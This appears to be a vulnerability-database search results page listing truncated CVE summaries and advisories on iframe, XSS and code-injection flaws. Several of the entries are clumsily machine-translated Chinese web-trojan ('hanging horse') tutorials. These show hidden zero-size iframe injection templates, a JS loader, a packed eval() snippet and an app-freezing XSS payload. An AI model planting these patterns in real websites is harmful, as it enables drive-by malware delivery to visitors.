5123 matches found
Code injection
WebKit before r53607, as used in Google Chrome before 4.0.249.89, allows remote attackers to discover a redirect's target URL, for the session of a specific user of a web site, by placing the site's URL in the HREF attribute of a stylesheet LINK element, and then reading the...
CVE-2010-0315
Removed by vendor...
Mozilla IFRAME Style Change Handling Code Execution (CVE-2008-1236)
Firefox is an open source web browser developed by Mozilla Foundation. The application is capable of interpreting and rendering many types of Internet content, including various versions of HTML, XML, CSS (Cascading Style Sheets), JavaScript, various graphic formats, and so on. Firefox is made availab...
Facebook For iPhone Cross Site Scripting
Facebook for iPhone persistent XSS. Facebook application for iPhone is not encoding special characters in Notes detail. Adding this code in a note will freeze application: var x = 'x'; while 1 document.write''; x = x + 'x'; App page: http://www.facebook.com/apps/application.php?id=6628568379...
New SQL Injection Affects 132,000
A large-scale SQL injection attack has injected a malicious iframe into tens of thousands of susceptible websites. The injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. Read the full article...
10 kinds of hanging-horse methods - vulnerability warning - the black bar safety net
I: iframe hanging horse: <iframe src=address width=0 height=0></iframe> II: JS file hanging horse. First, put the following code, document.write("<iframe width='0' height='0' src='address'></iframe>");, in a file saved as xxx.js; the code that hangs the JS is then <script language=javascript src=xxx.js></script> III: js...
Two new hanging-horse methods, 11 hackers Handbook manuscript - vulnerability warning - the black bar safety net
Two new hanging-horse methods, by lcx. This is only a technical discussion, not anything specifically harmful. If you want to use my method to do that, I can't help it, huh. Hanging a horse basically means adding an iframe to a web page's source code. On loading the iframe, I used...
Another method of hiding a pony - vulnerability warning - the black bar safety net
The following is the source code. You can set the parameter content, add the pony and then encrypt it. OK. html body % if request"dst""dst" then 'determine whether the parameters are correct. Incorrect access a non-existent address response.write"iframe src=dst width='100%' height='1 ...
SeaMonkey scriptable plugin execution in mail (mfsa2010-06)
The mail component in Mozilla SeaMonkey before 1.1.19 does not properly restrict execution of scriptable plugin content, which allows user-assisted remote attackers to obtain sensitive information via crafted content in an IFRAME element in an HTML e-mail message, as demonstrated by a Flash objec...
Mozilla Firefox IFRAME Cross Site Scripting (CVE-2005-1476)
Mozilla browsers use the W3C Document Object Model (DOM) to provide a structural representation of an HTML document and define the way this structure is to be accessed from scripts. One of the core objects exposed by DOM is the window object, which is used to represent a browser window. An HTML pag...
Code injection
Apple Safari on iPhone OS 3.0.1 allows remote attackers to cause a denial of service application crash via a long tel: URL in the SRC attribute of an IFRAME element...
CVE-2009-3271
Apple Safari on iPhone OS 3.0.1 allows remote attackers to cause a denial of service application crash via a long tel: URL in the SRC attribute of an IFRAME element...
CVE-2009-3271
Apple Safari on iPhone OS 3.0.1 is reported vulnerable to a remote denial-of-service via a long tel: URL in the SRC attribute of an IFRAME element. The underlying issue is the handling of oversized tel: URIs in IFRAME SRCs, which can cause the browser to crash. The CVE is CVE-2009-3271. Affected ...
Breaking IE's security restriction on access to local cookies within an iframe sub-frame - vulnerability warning - the black bar safety net
Source: aullik5. Today this article mainly covers the following few things: 1. iframe limitations 2. Ideas for breaking out of the iframe to get the local cookie 3. Using the Cross Iframe Trick to break through iframe security restrictions. My test environment is: IE 7 7.0.5730.13 All of the following content all...
Apple Safari IPhone (using tel:) Remote Crash Exploit
No description provided by source. Apple Safari Iphone Crash using tel: Found by cloud : cloudatmadpowahdotorg http://blog.madpowah.org Tested on Iphone 3G, OS 3.0.1 Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear Exploit: ?php settimelimit0;...
Analysis of JS trojan attacks and prevention - vulnerability warning - the black bar safety net
Web hanging-horse attacks have now become one of the main ways hackers launch cyber attacks, so protecting against Web security threats is particularly important. This article will introduce some common JS hanging-horse phenomena and how to respond. Trojan has always been a hack of adept...
55,000 Hacked Sites Serving Malware Cocktail
Security researchers are raising an alarm for a potent malware cocktail — backdoor Trojans and password stealers — being pushed to Windows users from about 55,000 hacked Web sites. According to Mary Landesman, a researcher in ScanSafe’s security threat alert team, the cybercriminals have embedded...
Calling a net horse from swf - vulnerability warning - the black bar safety net
Spent the afternoon researching calling a net horse from swf. I don't really understand swf, yeah; packaging a pure-script net horse is no problem, but packaging an overflow-type net horse will have problems. Simply calling the iframe directly is a bit boring, really like taking off your pants to fart, yeah, but still...
Examples teach you to understand the net horse - vulnerability warning - the black bar safety net
The main code is as follows: <SCRIPT language="JavaScript"> window.status="completed"; eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--)d[c.toString(a)]=k[c]||c.toString(a);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new...
Linea 21 1.2.1 Cross Site Scripting
+ Linea 21 version 1.2.1 search XSS, Iframe Injection and Redirect Vulnerability + + Download : http://www.linea21.com/index.php/Actualites + + Discovered...